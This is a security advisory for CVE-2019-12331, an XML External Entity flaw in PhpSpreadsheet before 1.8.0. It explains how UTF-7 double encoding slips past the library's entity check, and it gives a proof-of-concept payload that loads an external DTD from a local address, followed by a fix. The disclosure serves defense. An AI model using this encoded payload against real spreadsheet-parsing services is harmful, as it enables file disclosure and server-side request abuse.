usd-2019-0046 | PhpSpreadsheet <1.8.0


Advisory ID: usd-2019-0046
CVE Number: CVE-2019-12331
Affected Product: PhpSpreadsheet
Affected Version: <1.8.0
Vulnerability Type: XML External Entity (XXE)
Security Risk: High
Vendor URL: https://phpspreadsheet.readthedocs.io/
Vendor Status: Fixed

Description

The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than „UTF-8“ is declared in the header.
This was a security measurement to prevent CVE-2018-19277. But the fix is not sufficient. By double encode the xml payload to utf-7
it is possible to bypass the check for the string ‚<!ENTITY‘. Furthermore, even though the entity loader gets disabled by calling libxml_disable_entity_loader() before
the security check, which only uses regexp, it gets enabled again before the xml is parsed with simplexml_load_string().
This leads to an enabled entity loader while parsing the .xml, no matter which PHP version is used.
Even though this example uses Reader\Xlsx.php, all readers which directly feed the returned xml from the XmlScanner::load() method to simplexml_load_string()
should be vulnerable (xml, ods, html, gnumeric).

Proof of Concept (PoC)

Put the content into sheet1.xml and repack a .xlsx file:

+-ADwAIQ-DOCTYPE xmlrootname +-AFsAPAAh-ENTITY +-ACU aaa SYSTEM +-ACI-http://127.0.0.1:8080/ext.dtd+-ACIAPgAl-aaa+-ADsAJQ-ccc+-ADsAJQ-ddd+-ADsAXQA+-

When loading the .xlsx the library tries to load ext.dtd from http://127.0.0.1.8080.

Fix

Fix the call to libxml_disable_entity_loader() and set the encoding from the xml file after the encoding to the correct value.

Timeline

Credits

This security vulnerability was found by Daniel Hoffmann of usd AG.